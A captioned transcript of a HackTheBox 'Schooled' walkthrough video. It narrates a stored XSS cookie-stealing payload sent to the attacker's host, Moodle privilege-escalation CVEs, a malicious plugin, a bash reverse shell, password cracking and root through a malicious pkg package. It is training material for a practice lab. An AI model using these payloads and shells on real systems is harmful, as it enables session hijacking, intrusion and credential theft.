HackTheBox - Schooled

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on youtube this is ipsec me doing school from hack the box and i really like this box because it shows the value of chaining together multiple cves to get what you want and in this case it is a shell on the box and it does that by installing the open source application moodle which is essentially just a web application for online schools similar like blackboard canvas or google classroom i don't know what other ones there are but that's not really important the important thing is there's a few cves that starts out with a cross-site scripting vulnerability in your profile they can use to steal the cookie of a teacher and there's another vulnerability that allows teachers to escalate to managers which is like an administrator and then there's a third one once you're a manager to re-enable the ability to install plugins that you can use to upload and get code execution on the website once you're on the box it is a free bsd box you crack a user's password s u as them or you can ssh into the box as that user and they have the ability to install packages with pkg which is just like apt but for um bsd and you can create a malicious package and install it to get code execution as root with that being said let's jump in as always i'm going to start off with the nmap so dash sc for default scripts sv enumerate versions oh a i'll put all formats put in the nmap directory and call it schooled and then the ip address of 10 10 10 234. this can take some time to run so i've already ran it looking at the results we have just two ports open the first one being ssh on port 22 and as banner tells us it's a free bsd box which i don't have much experience with however it is very similar to linux so once i get a shell on it i think i'll feel right at home and then we have a date here this is either probably the date open ssh was compiled or the date of the kernel i don't know exactly what it is but it does say it is 2020 february 14th so i know the box was at least updated on this day it may be after it because i don't know how frequently the free bsd release cycle is but if you like updated in may and there wasn't a new kernel maybe this date doesn't get updated but what this does tell us is we don't have to look at really old cves like image tragic or things like that because chances are they've been updated if i saw this as like 2016 2015 i'd be looking at things like hurt bleed shell shock things like that but because it's recent i can just ignore all those old vulnerabilities and move on we also have http on port 80. it's running apache httpd and i'm sure we can look at this version with freebsd and find out more times when this box was released i wonder if i can just google like php 7415 freebsd let's see what happens i'm actually not sure freebsd this php version what does this do uh exploiting moodle i'm guessing this is a write-up or something yeah so we'll ignore that uh let's see fresh ports php7 i don't know if it really tells us too much 7415 i wonder if we can pull this so 04 february 2021 so that's when this php version was released so we know the box was updated in 2021 now whereas before we were thinking it was just 2020. so this leads me to believe it is the ssh version and not kernel version but if i remember we'll look at that once we get a shell on it um and generally boxes retire like six to seven months after they release and this means the box was probably updated right before it launched so shouldn't look at any of those old cves that would be affected in like a package managed by the package manager so let's go take a look at the website so going to 10 10 10 234 and am i not connected let's see it is 10 10 10 234. come on firefox there we go i'm not sure exactly what the delay was there uh maybe i had to type her somewhere and copy and paste saved it for me but we have schooled the educational institute and we're just looking around this uh we are schooled in online institution if we go click lawnmower we can look at the bottom left that's just going nowhere because it's got that little pound signed after the link so we don't really have anything here looks like we go back to 2004 this is a weird way to do a timeline like the order is on the right i've never seen a timeline like that i'm surprised 2002 is not here uh let's see testimonials don't have too much we do have an email address as admissions at school.htb and because we have school.htb we should probably put that in our um host file so we can access it over dnf so let's go back to our terminal and do sudo v etsy host and we can say 10 10 10 234 is school dot htb save that and then we can take a look at the page to see if it brings us anywhere else it doesn't look like it does so while we're looking at this we can set up a quick go buster so go buster directory mode dash you for url http school.hdb we could have done the ip address since the same sites it doesn't matter dash w for word list we'll do opt set list and then discovery web content then raft small words.txt and we should check if this is php so i'm just going to do like index.php we don't get anything let's try index.html we get a page so this is most likely going to be a static site if we go to about we also got about.html so i can do x for extension html and that should be good uh we probably want to do dash o for outfile we'll just call this dirtbuster.out and let that run to see if there's anything interesting going to teachers we have names so if we can find like an email address we can figure out how they do emails um or like the usernames convention because this is admissions at school.htb so it may be like l carter for the username it could be leanne underscore carter it could just be carter it could just be leanne we don't know how their usernames work so that is kind of what i'm looking for on this website to see if we can get any other emails the contact page is a good place to go and it just brings us up here so we don't really have too much a patient load google maps correctly so no real emails we do have a copyright of 2020 so we know that's not dynamically updated and it's not a big surprise because this is html nothing else we could take a look at the source code to see if it was built with anything but again i'm not really too interested because this is a html site not php python whatever so i'm going to go on and we'll look at go buster we don't really see too much so let's check uh virtual host out so let's do go buster i think it's v host yep url and word list so we'll do you http school.hdb and the word list will do up set list discovery dns sub domains we'll try top 5000 first and see if this gets us anything and we have moodle.school.htb so this is definitely something um moodle is a open source application to like build courses things like that for students so let's go sudo vi etsy host and add moodle.school.htb in there and we can take a look at this page and it looks like a moodle instance we can see by this banner here and the first thing we want to do is try to find a way to enumerate this version so i'm going to go to the github page because i know this is open source and we can take a look at things on this page so if we go here we're looking for a way to identify the version and i always look at like the months ago because i want something relatively recent like if it's updated six years ago i can ignore this file because it's not changing that often ideally i want something that gets changed very frequently because that is indication that something is changing like this readme it's six years ago so it's not going to have a version information same with like install.text since it's not being changed it's of no interest to us we could check if it exists so if we go to slash install.text install text not found maybe we have to go into slash moodle which will tell us potentially where everything is installed so moodleinstall.txt exist which confirms we can access these files but nothing too interesting we have version.php and security.text so these two are good let's try security.text see what this is not found let's try version.php we don't get anything back because we probably have to be logged in to view this page if i look at the source code to this it may be quick to tell um defined moodle internal or die so whatever this field is it's not defined so we're dying immediately i'm guessing um like this will be defined if we're coming from an admin page or something like that so i don't see anything jumping out at me right off the bat the next thing i like looking at is themes because generally this is where like a lot of javascript files go so we won't have that issue with php where it just displays nothing because it's trying to execute code javascript's generally static and there's a lot of dependencies let's say like jquery a lot of libraries don't update jquery that frequently but if it does you can generally get an idea of the version of something so like if this was keeping up to date with the latest version of jquery which is just a javascript library a lot of web applications use we can see how frequently it commits like on this we got a five day ago we look at the releases we have one in merch one in may so again you can get an idea of when this web application was released based upon looking at the javascript we also have upgraded.text it is eight months ago but if i click it we can see it looks like it has major versions so i'm going to try this so it is slash theme upgrade.text and we can see it is saying three nine and if we look at this it goes all the way up to 311 so we know we're running moodle version 3.9 the other really nice thing about like searching versions or using i don't know what i was going to say the other thing we can do is look at security announcements a lot of applications do have security announcements if they don't they can look at like cve databases but if we look at security announcements it lists all the known like major security vulnerabilities to us and tells us if it's like minor a major vulnerability things like that the thing we don't know now is which to look at because um we could just keep clicking the pages and look at versions fixed and get an idea of what's there but the better way to go about this is look at when moodle three nine was released and then uh work our way back um [Music] let's see moodle three nine looks like it was june of 2020. if we look at release notes we can also confirm that day release notes are on july 14th but the release date is june 15th so i'm guessing the page was just updated july 14th or something not sure exactly what but here we just want to go to something that is around um june of 2014 so let's go here let's see we're in january 2021 still september 2020 and if we go to the next page that is march of 2020 so it's somewhere on this page most likely and let's see that's march may may july 2020 so we know from this day on moodle is like anything may be applicable to us because somewhere between this may 18th and july 20th is when it was patched we can see this very first thing is a jquery version it is only marked as minor so if we looked at like when jquery was released we'd probably be able to flag around the time this was updated because they updated jquery in response to this vulnerability so even if upgrade.txt wasn't there we'd still find a way to enumerate this application looking here we have reflective xss and admin log filter we have course enrollment allows privilege escalation from teacher role in the manager role uh denial of service stuart xss via moodle net profile parameter with another xss so there's a lot of cross-site scripting vulnerabilities let's go all the way to the bottom and keep going up login as in course context may lead to privilege escalation denialist service chapter name so we have a lot of vulnerabilities i don't see anything like unauthenticated we can look at like search point as well to see if there's any like unauthenticated cves but i don't really see anything there there's this rce but it's 341 so i'm just ignoring that so let's go take a look back at the website let's go to moodle.school.htb and we are not logged in we can potentially try to see if we can enumerate user names to get how um they do it so if i do lead because the name was leanne carter it says if you supply the correct username and email it will email you so it's not telling us valid username so we can ignore that let's try it on the email address lcarter at school dot hdb to see if anything there again it's the same message if we had a valid username or email or not so we can't validate potential usernames and since i can't validate a username yet that's why i'm not going gonna go down this like password spraying brute forcing type thing but let's try uh creating an account so we can create the account ipsec the password of password1 email address let's do root dot rocks copy it do it again yep sec we don't have to do city state anything create account and email is not allowed we need an email with student.school.hdb so let's do this and just use that domain for this email and see if it works my first intuition is this won't work because we don't have any way to retrieve this mail to click something that verify we own the email but if they don't have email verification on then it'll work so click the link below to confirm our account okay and looks like we're logged in so they don't have any type of confirmation looking at the cves we knew there was a cve if we can get a privileged escalation if we can get to the teacher role but um chances are just signing up doesn't give us that teacher role so there's not much we can do in terms of the cve right now going to the dashboard i don't see anything let's go back to the home page where is course enrollments site home so we got four courses let's check out these if this gives us any different information now that we're logged in we can enroll we can't enroll in scientific research i t or english but we can roll in this math one so i'm going to enroll in math and let's take a look at anything here the teacher is leanne carter wait i'm in english now what just happened that was weird i thought i was enrolling in math and suddenly i went to english but back here we are now in the mathematics course if i look at we can see phillips has two announcements or one announcement from phillips and one from jamie reminder for joining students this is a self-enrollment course for students who wish to attend my lectures make sure you have your moodle net profile set students who do not will be removed from the course before they start and he will be checking all students who are enrolled in this course so generally whenever i see someone will be checking something especially in a ctf uh i know there's going to be some type of like automated thing to do interaction in this case i'm guessing it's going to be a cross-site scripting vulnerability because if we look at the um moodle thing we had a stored xss via moodle net profile parameter and what this is saying is middle net profile set so i'm going to try to edit my profile and see if i can put some type of cross-site scripting go to my profile edit profile and here is middle net profile the first thing i want to do though is just um test something real quick i'm just going to put cross-site scripting everywhere uh description sure additional names i probably should be putting a unique thing here but like unique per field but i'm not and let's see if they have input validation here because this could be a big pain if they do doesn't look like they do and now i'm just looking for wherever there's bold so we can see this middle net profile does have bold here so since it's processing html um we can try cross-site scripting so if you're trying to look for a oh day in this and do it on your own this is generally how i'd go about it just putting cross-site scripting in a bunch of things and when you get one then you know so we can edit a profile again and put our javascript thing here and additionally you could just do what we're about to do and have javascript call back to you and that will help you if there's like a blind thing so there's a chance that like it's doing input validation or i guess output validating on all this javascript when we view the profile but maybe the admin panel it's not doing output validation somewhere and we'll get triggered cross-site scripting we have no way to identify that because the cross-site scripting payload we're using is completely visual to us but if we did something like script source is equal to http 1010 14 8 slash um we'll call it please subscribe.js and then slash script then if it gets triggered elsewhere we'll still know because of um the callback as long as we're monitoring that and that's how tools like xss hunter work and why they could be useful because you just stand up the server put all that payload everywhere and then when you get a call back it kind of tells you the page it was on so let's do nclvnp80 just to set up a listener to validate that cross-site scripting works update profile and we're hanging right now because we have a connection and then we close that and the page comes back so we know we have a way to get code execution so what i'm going to do is make dir well not code execution but um cross-site scripting go into dub dub dub i'm going to sudo python 3 http.server on port 80. we've got the dash m there we go and then we called it what please subscribe dot php or not php js right i called it js yes i did so we just have to write javascript to do something um my first thought is just to [Music] steal the cookie so i'm going to do document.write and then we can do um let's do an image image source is equal to i'm going to put this in single quotes http 10 10 14 8 slash question mark and then document.cookie [Music] plus and we want to close this that's a single quote there so i'm doing is i'm putting this is one thing and we're terminating the single quote so i can put a variable which is going to be a cookie and then let's start the single quote again we can kill that and i can't remember if i need a slash for the image i don't think i do so let's just do that and see what happens so we did have the box reach back to us while we were writing that script and we did not save it yet so we missed that hit so let's just refresh the page to make sure everything works i got this and not found so there's a typo somewhere or not a typo but i did not put it in the right directory sent so this is me 10 10 14 8 we got please subscribe and then the javascript sensor mural cookie so everything looks like it's going to work i'm just going to pause the video and wait for the automation to come to get the cookie of the user so we have the moodle session coming back and this time we can see it's 10 10 10 2 34. so i'm going to do is put this cookie in my browser and see if it works so i'm going to press f12 then we can go to storage cookies moodle session and let's change out that cookie to be the other user and refresh the page and we can see i am now manual phillip and manuel phillip is going to be a teacher role i'm trying to find out a way to validate that if i go to let's see blog form not exactly sure where it would say that we can definitely see where emanuel phillips and if we looked at the courses he is the owner of this mathematics course so let's go back to the moodle security announcements and find that one vulnerability so this msa 2009 course enrollment allows privilege escalation from teacher role in the manager role and teachers of courses were able to assign themselves the manager role when within that course we have the cve here and when searching for public exploits the cve is generally what you want you also have the reporter name so we can first just search this on google and see what happens uh the reporter's name is right up front i was going to say if we don't have um anything then we could put his name in there as well to find it or put the cve in github looks like there's some automated scripts to exploit it but i don't want to do the automated script i like stepping through it for these videos so that's what we'll do he's showing that you can use docker to just pull the exact moodle version and then test it that way he does provide a um actual python script but also a blog and video i wonder what the blog says when i did it did i just get like popped that was weird uh you block origins block something well i don't know what's going on there let's not go to that link uh that if i revert this vm when i'm done this video that definitely a little uh concerning but yeah so sometimes when you click links weird things happen and when weird things happen it's pretty bad we can look at the video proof of concept and this is essentially how i did it i'm not going to watch this whole thing because we can explain it so the first thing we have to do is get the manager of moodle and the easiest way to do that is on the school page or we could do it kind of like through trial and error or just clicking around moodle but leanne carter is the manager she's the only one that has this so if we go back here let's see let's close some of our unused tabs there we go so let's go courses we need to find a way to enroll a user so let's see site home my courses that's where i'm at participants enroll users and it bothers me i think this is spelled correctly it's just a different like dialect or something i always thought enroll had two l's but i digress so we want to select leanne carter because she is the manager and then the assigned role doesn't matter too much and we also have to get our user id so that is the next piece of this so before i do anything i'm going to try to find and generally like on a profile page or something is where you can find your user id so let's go to profile my id is 24. so let's turn burp suite on where is this burp do this proxy intercept on enroll user and we can see the action enroll enroll id um [Music] one of the easy ways to edit things is through this inspector tool albert suite now we don't have to go read all this we can just see this user list we have to change this from 25 which is the user id of leanne carter to 24 which is the user id of us and then we also want to change the role to assign to be one generally the most like admin role is going to be one five is probably the teacher role so these are just identifiers of what role it is and if you don't know this you could have to look through like the moodle source or look through the cve things like that so we change the user list to our id and the role to assign to one i'm gonna put this in the repeater tab and send it and we have success true so now if i go to the dashboard we disabled burp suite let's go back see is leanne carter enrolled where are you leanne she should be in here travis wright role student emanuel phillips manager teacher i wonder if i have to let's see 25 i think i have to enroll ian carter as well into this course so i'm going to enroll users and we'll just do leanne and this time we won't edit anything and now when i click on her page i can do login as and this wasn't here if we did not do this one step this one step with some weird like mass assign well not mass assignment probably an eye door vulnerability into being able to sign the permission to do what i just did so now we are logged in as leanne carter and leanne carter is a manager so if we go to site administration plugins we can see we can't install plugins because it is disabled but if we let's see where is it there's something here where we can go and enable it see site administration block edits on where are you i think it's under users yeah define roles and then let's see allow role assignments if we save the change here this is going to be i think a mass assignment vulnerability or maybe it's role override manager already checked everywhere i think this is actually a mass assignment vulnerability and that's when you're able to make changes to things that the web ui just doesn't like give you the ability to but if you put it there you could do it anyways so to kind of explain that let's save changes and i sent this to burp suite so we can look at this where is it moodle come on let's turn rip suite off real quick manage roles manager okay this one's it so we got all these things here and maybe it's on the page but where is save edit reset so if we edit this we could try clicking allow on all but the blog post is going to give us something that is super handy and then we'll go over it so we have all these fields here i'm going to send this over to repeater and what the blog post wants us to do if we still had that up let's turn burp suite off go to the github page blog post want us to copy this so we just copy this whole thing and then after we do this we're going to look at kind of what's changed to kind of explain the mass assignment i think that'll probably be the easiest thing uh we leave the session id and paste everything else come on get to the bottom i want to be faster if i just do page down paste put that in a new tab see manage reset type we send this see other so now let's go back here and go to the plugins to see if we can install a plugin save administration plugins and now we have this install plugin and almost anything that lets you install a plugin means you can just get code execution because you can just create a malicious plugin but before you do that let's take a look at exactly what we just did because this was unclear i guess i could have used the drag bar earlier so i'm going to [Music] v1.text and this is going to be or edited one and then i'm also going to be 2.text and this will be unedited we can just grab it from here this will probably be the safer bet so copy save and right now this probably looks like an unmanageable mess right like how do we find out what's different here well we could save both of these and like do a diff on the files but it's not gonna really be too helpful so i'm going to press the tmux magic key which is control b for me and then colon and we can do set w synchronize panes that synchronize dash panes so now anything i do in one pane it happens on the other one and i'm going to um just hit colon s and we're going to look for the ampersand and we're going to replace it with backslash r which is a return and now we have this and we can also probably want to sort just to sort everything so i did colon sort and now we have every thing here we go to the very bottom and we can see the one on the right has 1242 lines the one on the left only has 729 so we know there is a difference between the two and we can see let's see allow a sign one two three four five the one on the left this is the um exploit is going all the way to eight so i'm going to disable the set w um actually do it in tmux set w synchronize panes so we can add things so we had five six seven eight six seven eight just so these are starting to line up and i can see the bottom line here is arc type equals manager and it's not that for the exploit so we can see it is just adding a lot of variables this allow override one two three five six seven eight that is good this allow switch this is going six seven eight so that's what it looks like and we can go here we have one two three four five six and this is ending at five so we're missing two lines somewhere so let's see line 18 is that 27 is this allow switch oh we're missing one two three or one two so if i do two lines there we go so this is called mass assignment because the web interface isn't giving us the ability to do a lot of the variables however on the server end it's just looping through all these parameters and we'll just assign them into the database even if you're not supposed to be able to um the website doesn't have the logic to assign these things but the server end because it's dynamic it does have the logic so if you sent that to that anyways it would assign it another common place where you normally see this vulnerability is like the registration forms where you just register an account and then it's passing variables in and essentially what the web application is doing is it's looping through every variable you did and putting it into the registration database and it's saying you know what if the group doesn't exist i'm going to assign it the default group which would be student but if you just sent the parameter group equals admin there's a chance the web application just sees them goes oh this isn't taking the default group and assigns it to the admin role that you specified so mass assignment and my understanding is generally when you send it a parameter it's not expecting but will work with anyways so with all that being said let's just go back to this and see if this still works it looks like it's still enabled and we have to install a malicious plugin in this it looks like he is installing something called block rce let's see he's downloading it here so this is the malicious plugin so we can just download this so let's close these panes because we don't need them we can do get clone paste this moodle rce oh we don't want to unzip it actually uh let's see we can just do it and then the main blocks rce okay so install plugin oh no not moodle directory uh zip and where do we upload our own uh upload a file browse and then we want to hdb [Music] uh scold and moodle rce rce.zip i wonder if i have to specify any of that doesn't look like i do install plugin from zip validation install can continue so we continue and let's see if we can get code execution so domain slash blocks rce so domain let's try it here so we're doing moodle.school.http moodle cmd is equal to id boom we have it so i'm going to set my burp suite back on refresh this page and what i want to do is change the request method to see if it accepts post and it doesn't so the annoying thing with this plugin is it's only on get parameter which that is fine but we just know we have to work with it like this so i'm going to do uh let's see let's see if this reverse shell works um it may not work because it's bsd so bash dash i then dev tcp 1010 14 8 9 000 1 0 and 1 and then we want to url encode this nc lvmp 9001 send oh it does work so we can do python 3 dash c import pty pty dot spawn then bash python3 command not found let's do which python um which script we do have script uh shoot how do i do it with script i think script dash queue uh and then is it bash dev null scan assign that let's do script dash q dev null like that i know there's a way to get a proper pty with this script binary let's see script file command so i thought it was script dash q devnull bash i wonder if bsd is not letting me do that let's do script dash queue devnull bash so it's working on my box but not working here the other thing python may just not be in the path so i'm going to do find slash 2 dev null to hide errors and we can grep for python and we can see python37 does exist so it is somewhere i may want to grip for like part ends in python or we can try like use a local bin let's echo path uh we only have s pen user s pen and user bin we don't have user local bin so user local bin that is a directory and we can grep for python and it is in here so i'm going to put the user local bin as part of my path so i'm going to do export path is it do i have to export or just do path path equals path user local bin echo path oh that was not good oh because i didn't put this in capital do i still have this yeah so let's do this so we still have our path so path is equal to this user local bin then which python three now python three exists so we can do python three dash c import pty pty dot spawn then bash and now watch the pty dot spawn or pty library is not gonna be here right uh cannot get access to parent directories python three dash c import pty pty dot spawn bin bash there we go i wonder if the script would have worked if i just wasn't in that directory something weird is going on but oh well stty raw minus echo and then hit fg enter enter and now we have tab autocomplete so what we want to do is probably cat etsy passwd and we can see there is a few users in this box what i'm going to do is the same exact thing but grep v no login and we can see the users we have root tor s u [Music] tour sq dash tour so it looks like we can't s you yes you jamie okay we can we just can't get into that user oh because he probably doesn't have a login shell or something but we have jamie and steve that we could potentially escalate to so the thing i want to do is um get jamie's or steve's password and if we go back to moodle.htb we can see i think one of them is a teacher um it's called hdb my bad teachers jamie there is no steve here so i don't know exactly who steve is but jamie is probably going to be or jamie boreham is probably going to be this jamie user so that's the user i specifically want to target um bsd's web directory is not going to be very www.html it's going to be in this directory so i'm going to go here and look for moodle's configuration file so let's do cd like this and then oh where is moodle's config find dot grep config admin auth so when i don't know um where the database password is in application generally i just do a google on update database password moodle and look at how i change it so let's see php my admin my sql database my sql password change i need to change it somewhere in moodle so moodle installation config.php cat config.php oh it was there okay so yeah but generally that's how i find the files so we have my sql native localhost here we go database password so mysql dash u moodle i can do dash d to specify the database of moodle as well i think it's dash capital d and then we need to tell it we want to use a password so dash p and then paste the password of playbook master was it 2020 yeah so we can do show tables and we have a lot i'm going to look at the user table so i'm just highlighting everything with users and let's see user daily portfolio chat uses there's a lot of tables in moodle oh god uh maybe chat users it doesn't sound like it let's see user daily oh mdl underscore user so let's do describe mdl underscore user and the reason why i'm doing describe first because if i just do select star mdl underscore user uh select star from mdl underscore user that's like that's a lot of stuff we can see all our xss tests and we can look a lot of these don't even store the um html tags so if i was looking for like an oday i'd look for the logic that's removing these html tags and seeing if i can encode it in a different way to trick the thing that is um removing it because if it gets in the database chances are um it'll work so let's do describe then we want to look for fields that are interest to us probably username password and first name potentially email so username password first name email so select username password first name email from mdl users or is it user yeah and the reason why i wanted these fields is in case the username is an indication of jamie uh first name would definitely be jamie and email is just good to know uh if we wanted to format properly though i probably should take that email off we can buy just do first name and password there we go so we know there's two users on the box it was what steve let's see if i do exclamation point i think it will execute the bash command etsy passwd group v no login maybe that's not how you do it but we know we wanted shoot we know we wanted jamie and this is actually a pretty decent hashing algorithm so i'm not going to try to crack all these because it's hashed if i put all these in then hashcat would have to attempt each one each time or john or whatever hashing program you use so i just want to do this one so it goes as quick as possible we're doing jamie because jamie has an account on the box so i'm going to do v dot text and i think my kraken is busy right now so i can't switch to that i'm just going to use john so john w [Music] user share word list rock you text i think it's wordless equals i think that's how you do it in john text we'll see be crypt so i'm going to let this wait to see if it cracks we have the password cracked so we can just grab this and go back to a reverse shell and do su-jamie paste in the password and we are now as jamie we can try ssh-ing so let's try ssh jamie at 10 10 10 234 yes put the password in and we can s hn i always prefer ssh connections because it's just more stable than the reverse shell and better for like persistence so i'm going to be working off of this if i do sudo l we can run sudo and i thought bsd normally used do as but maybe that's open bsd and freebsd uses sudo i'm not exactly sure the difference between do as in sudo and bsd language but we can see we can run package update and package install so i'm going to go to gtfo bins and is it gtfo maybe it's com i'm just going to google it real quick like this pkg and we can do pkg with sudo and it looks like makeder we got fpm and fpm is something we used before i believe i go to ipsec.rocks fpm we used it in armageddon to install and build packages so i'm going to do that again package install dash y no repo update and then we can specify this is that going to work in this package install i believe it is so let's create this package so do i still have fpm uh cd slash opt fpm let's see github fpm package create and if we don't do this we'll just create the package manually so there's this fpm is to make it quick and build packages okay how do i build this this is oh ruby i think is it i just saw rube right there spec i'm guessing it is is there a been fpm let's just clone this or go to releases 131 just source code i really forget how to use this i may have to pause the video and um watch that video pause this video to watch another video see rake build is that it i wonder if that's not like i'm i read this as a um package error like it didn't have a library to run but maybe it's just a normal error of not giving it all the correct parameters so let's try this just copy these paste okay it does work make their attempt d echo tf so that's just a ram directory name and it's echoing something to a file and then executing said file so we probably want to echo and let's see slash temp shell.sh to tfx.sh and we can probably just copy this see it already exist so let's go to slash temp and delete everything we did uh rm-rf temp dot star so tf is equal to that make we're executing tap shell and creating file already exists let's see what file did it create it was like a x one that's it that's the file it's complaining about so now we created this package let's host it http server go back to our shell w get 10 10 14 8 slash what was it x 1.0 port 8 000 paste it curl dash o x-1.0.txz okay and i'm going to v temp shell.sh and i'm just going to echo test to temp pound and we probably should bend csh i'm doing csh because that is the shell in freebsd if i look it's not been bashed i've been sh it's been csh so that's why i'm using that do i have bash which bash bin bash it does have bash so i'm going to change it out to be bin bash chmod plus x temp shell.sh and we can go back to the gtfo bin to try to execute it see new package be installed is not specified in the manning fest do lsla on temp and we do have a pwned owned by root so if i do temp shell.sh let's try a reverse shell so dash i dev tcp 1010 14 8 9001 0 and 1. that should be fine what if we have to create a new package looks like we don't and we are root and funnily enough this is a new gtfo bin i believe and that's not really the intended way the intended way involves creating this package but actually using the update feature as well so i control i'm controlling seeing here and it's actually zing to my root shell but we skipped one step of the intended way doing it that i honestly didn't know that would work when i was doing this but we're supposed to create a package like we just did and then we are supposed to find out that we're part of the wheel group and the lsla etsy hearst is modifiable by wheel so we can edit the etsy host and then point the devops.htb which if we look at cat etsy package freebsd this is where the repository is so we can edit this to be us 14 8 and then we run a package update python3 pcb server 80 with sudo already in use because we used it for our xss so right here if we run package update sudo it makes a get to us so we're supposed to create this whole package repository um so to do that we can go to google and say um what is it pkg create package see creating packages i don't know if that's the post i want free bsd without installing creating custom packages this can be a good one on us yeah so it makes a request to meta.conf meta.txz and packagesite.txt so we have to create each of those files i think there may be a package reaper command to create something i haven't actually done it so this will be a test i'm going to move the malicious package we created into temp and then we're going to do pkg repo period and yep it created all those files for us so we just got to get these files back to us so let's go into dub dub dub and we can scp um let's see 1010 10 234 temp star into this directory and then the we need jamie we also need the password do i have john still here i do so we can just grab this password paste sap each file python 3 and then pkg update sudo pkg update we may have to edit the host file again because it does revert so let's change this back to 127.001 127.01 uh my ip 10 10 14 8 10 10 14 8. we update uh once it end packages so make their packages package update and then do 10 10 14 8. this reverts pretty quickly so we updated the packages and we may be able to do sudo package install x and that does not look like it worked uh wrong architecture so it's marked as linux instead of bsd and that's probably because we had created this x 1.0 txz on linux is it x v let's see x jvf i don't think this is the right syntax no let's see enter extract xz let's try this just xf yep so let's see compact manifest cv not there meta.com package site dxz no see maker temp mv is it in this vx.sh this is just executing a shell let's just try this real quick uh we probably have to v etsy hearst 10 10 14 8 it's there package update this is pretty annoying to do it this way gtfo bins makes everything easy sudo package update pseudo package install i wonder if i do does it still say linux wrong abi ri linux so it's probably this manifest thing it's specifying linux 5 whatever and that's probably from the fpm so github fpm bsd build packages how do we change this so like a man page documentation see understanding the basics gotta be a way to be able to change the architecture i'm actually just going to move away from fpm and just edit what it created i probably can just unturn this edit it by hand and then create it so that's what i'm going to try maker uh please work mvx into this directory oh god uh mv please into please work x dot 1.0.txt x f this file and the reason why i moved into this directory is because it does create things so i just wanted to um see everything it unzipped and not clobbered the directory i was in i'm going to erase this txz and then we want to edit this manifest so many fast like that how do i edit this file single quotes i feel like this is an over the wire challenge now see if i v star manifest like that oh god is it gonna make me use nano is nana gonna handle this oh god uh this may be like the only time you'll see me being like how do i do this in vim and then switch to nano it's a little embarrassing but hey it works so we want to change this architecture from linux to freebsd so free bsd 13 amd 64. ctrl x to save this let's go compact manifest do the same thing here so free bsd 13 amd 64. i'm not sure what that 13 means maybe it's freebsd version uh no phone name right compact manifest there we go so we want to tar this so tar let's see tar create xz create our exam one command so capital j is xz so dash c j f x dash 1.0 dot t x z and then star right so now we have this package again so python3 dash m http server uh we probably just move this so let's move it up to directories and move packages to packages.old make their packages and we want to recreate this so maker package curl 10 10 14 8 slash x 1.0.t x z dash o x dash 1.0.txc that's saved that was pkg repo period okay so we want to go in packages and then scp everything again copy jamie's password sudo vi etsy host it's not a pseudo here just etsy host change this to 10 10 14 8 and then sudo package update sudo package install x what package update was it still linux 5. i'm guessing my repo command did that what let's see freebsd contains package with wrong well that's annoying i wonder if i just downloaded the wrong turn enter xf remove that see that's freebsd that's freebsd let's tell me the architecture's linux which linux isn't anywhere in this star yeah the manifest is bsd and the compact manifest is bsd as well let's see sudo package update it's taking a while so 10 10 14 8 update this oh you know that moment you realize what you did wrong scp it's temp package i created a directory package right yeah so in temp this is my old package so i just downloaded the old thing again there we go i think sanity is restored so that should be fine make sure the host file is correct so sudo package update see where am move this into packages okay okay so it got the packages and we don't have any complaints so let's nc lvnp 9001 and see if we can install x proceed with installation yes temp shell sh not found so let's create that file so is ben bash then bash dash i dev tcp 1010 14 8 9 000 1 0 and 1. ch mod plus x shell.sh package install yes and we get a root shell so that is doing it the intended way with package update and package install but hope you guys enjoyed that take care and i'll see you all next week

Info

Channel: IppSec

Views: 10,302

Rating: 4.9237056 out of 5

Keywords:

Id: bUfZlBMFJ2I

Channel Id: undefined

Length: 75min 55sec (4555 seconds)

Published: Sat Sep 11 2021